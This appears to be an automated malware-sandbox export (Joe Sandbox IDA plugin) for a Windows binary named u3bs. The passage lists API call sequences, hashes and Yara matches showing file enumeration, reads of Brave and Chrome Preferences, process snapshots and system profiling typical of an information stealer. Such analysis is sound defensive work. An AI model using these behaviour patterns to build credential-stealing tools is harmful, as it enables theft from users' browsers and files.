416d40 call 416da0 call 40a030 1028->1038 1107 40beb3 1033->1107 1045 40bc4c 1037->1045 1038->1037 1045->1012 1060->1012 1095->1022 1104->1045 1107->1012 1146->1147 1147->990 1196 40be20 1179->1196 1188 40be43-40be4e call 416e00 1180->1188 1188->1012 1196->1180
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                        • API String ID: 3334442632-726946144
                                                                                                                                                        • Opcode ID: 217fbc089ea81eaa224ec90d0f64b3e91da9f160fea060791b47bc177b42c4e3
                                                                                                                                                        • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                                                                        • Opcode Fuzzy Hash: 217fbc089ea81eaa224ec90d0f64b3e91da9f160fea060791b47bc177b42c4e3
                                                                                                                                                        • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1197 6b0735a0-6b0735be 1198 6b0735c4-6b0735ed InitializeCriticalSectionAndSpinCount getenv 1197->1198 1199 6b0738e9-6b0738fb call 6b0ab320 1197->1199 1201 6b0735f3-6b0735f5 1198->1201 1202 6b0738fc-6b07390c strcmp 1198->1202 1203 6b0735f8-6b073614 QueryPerformanceFrequency 1201->1203 1202->1201 1205 6b073912-6b073922 strcmp 1202->1205 1206 6b07374f-6b073756 1203->1206 1207 6b07361a-6b07361c 1203->1207 1208 6b073924-6b073932 1205->1208 1209 6b07398a-6b07398c 1205->1209 1212 6b07396e-6b073982 1206->1212 1213 6b07375c-6b073768 1206->1213 1210 6b073622-6b07364a _strnicmp 1207->1210 1211 6b07393d 1207->1211 1208->1210 1214 6b073938 1208->1214 1209->1203 1215 6b073944-6b073957 _strnicmp 1210->1215 1216 6b073650-6b07365e 1210->1216 1211->1215 1212->1209 1217 6b07376a-6b0737a1 QueryPerformanceCounter EnterCriticalSection 1213->1217 1214->1206 1215->1216 1218 6b07395d-6b07395f 1215->1218 1216->1218 1219 6b073664-6b0736a9 GetSystemTimeAdjustment 1216->1219 1220 6b0737b3-6b0737eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 1217->1220 1221 6b0737a3-6b0737b1 1217->1221 1222 6b073964 1219->1222 1223 6b0736af-6b073749 call 6b0ac110 1219->1223 1224 6b0737ed-6b0737fa 1220->1224 1225 6b0737fc-6b073839 LeaveCriticalSection 1220->1225 1221->1220 1222->1212 1223->1206 1224->1225 1227 6b073846-6b0738ac call 6b0ac110 1225->1227 1228 6b07383b-6b073840 1225->1228 1232 6b0738b2-6b0738ca 1227->1232 1228->1217 1228->1227 1233 6b0738dd-6b0738e3 1232->1233 1234 6b0738cc-6b0738db 1232->1234 1233->1199 1234->1232 1234->1233
                                                                                                                                                        APIs
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FF688,00001000), ref: 6B0735D5
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6B0735E0
                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6B0735FD
                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6B07363F
                                                                                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6B07369F
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6B0736E4
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6B073773
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B07377E
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B0737BD
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6B0737C4
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B0737CB
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B073801
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6B073883
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6B073902
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6B073918
                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6B07394C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                        • API String ID: 301339242-3790311718
                                                                                                                                                        • Opcode ID: 2e9d39f5b233f195a6c9ccd7b1f0e9262c2bfad9748d505c14f9966a73cdf0c5
                                                                                                                                                        • Instruction ID: a8a5694e552de0bf846dc5090218545dc2f3057bcd47d72368b8f9e95220d721
                                                                                                                                                        • Opcode Fuzzy Hash: 2e9d39f5b233f195a6c9ccd7b1f0e9262c2bfad9748d505c14f9966a73cdf0c5
                                                                                                                                                        • Instruction Fuzzy Hash: 74B17FB1B093109FDB18DF68D84571ABFEEAB8E700F05892DE999D3350EA34D801CB55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • wsprintfA.USER32 ref: 00412589
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                        • API String ID: 180737720-445461498
                                                                                                                                                        • Opcode ID: cfff7e71d02b1736ab1f1f7c997ebdcc83a84c1d4f68987a5e2369cfcdad3dbb
                                                                                                                                                        • Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
                                                                                                                                                        • Opcode Fuzzy Hash: cfff7e71d02b1736ab1f1f7c997ebdcc83a84c1d4f68987a5e2369cfcdad3dbb
                                                                                                                                                        • Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                        • API String ID: 180737720-4073750446
                                                                                                                                                        • Opcode ID: 6a840e30490d0d08afdc1253b2c36dc6dcc5f64356898c57fcf5146ff498d072
                                                                                                                                                        • Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
                                                                                                                                                        • Opcode Fuzzy Hash: 6a840e30490d0d08afdc1253b2c36dc6dcc5f64356898c57fcf5146ff498d072
                                                                                                                                                        • Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 1415058207-1173974218
                                                                                                                                                        • Opcode ID: f4763ada7c031ff38536aef9cb867afa4938067a9319c6e9b980bcd3ea4aaa06
                                                                                                                                                        • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                        • Opcode Fuzzy Hash: f4763ada7c031ff38536aef9cb867afa4938067a9319c6e9b980bcd3ea4aaa06
                                                                                                                                                        • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3334442632-0
                                                                                                                                                        • Opcode ID: b40c84206ab88950c8bc1da80f20c02468e8b1956029bad3f7442f400096f154
                                                                                                                                                        • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                        • Opcode Fuzzy Hash: b40c84206ab88950c8bc1da80f20c02468e8b1956029bad3f7442f400096f154
                                                                                                                                                        • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                        • String ID: /
                                                                                                                                                        • API String ID: 3090951853-4001269591
                                                                                                                                                        • Opcode ID: f7e689532fcb6c20cb78a89c4a24d6f915bfb465a8112885e31d740b2fc4d9cf
                                                                                                                                                        • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                        • Opcode Fuzzy Hash: f7e689532fcb6c20cb78a89c4a24d6f915bfb465a8112885e31d740b2fc4d9cf
                                                                                                                                                        • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 433455689-1173974218
                                                                                                                                                        • Opcode ID: b704405470cac820e6730755b1db4dd3b53a4f97c5af91ab5e7e42f18d6cbca2
                                                                                                                                                        • Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
                                                                                                                                                        • Opcode Fuzzy Hash: b704405470cac820e6730755b1db4dd3b53a4f97c5af91ab5e7e42f18d6cbca2
                                                                                                                                                        • Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BinaryCryptString
                                                                                                                                                        • String ID: >N@
                                                                                                                                                        • API String ID: 80407269-3381801619
                                                                                                                                                        • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                        • Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
                                                                                                                                                        • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                        • Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                        • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                        • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                        • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                        • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                        • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                        • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                        • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,043365E8,00000000,?,0041D758,00000000,?,00000000,00000000,?,043375F0,00000000), ref: 004144C0
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                        • wsprintfA.USER32 ref: 00414514
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 362916592-0
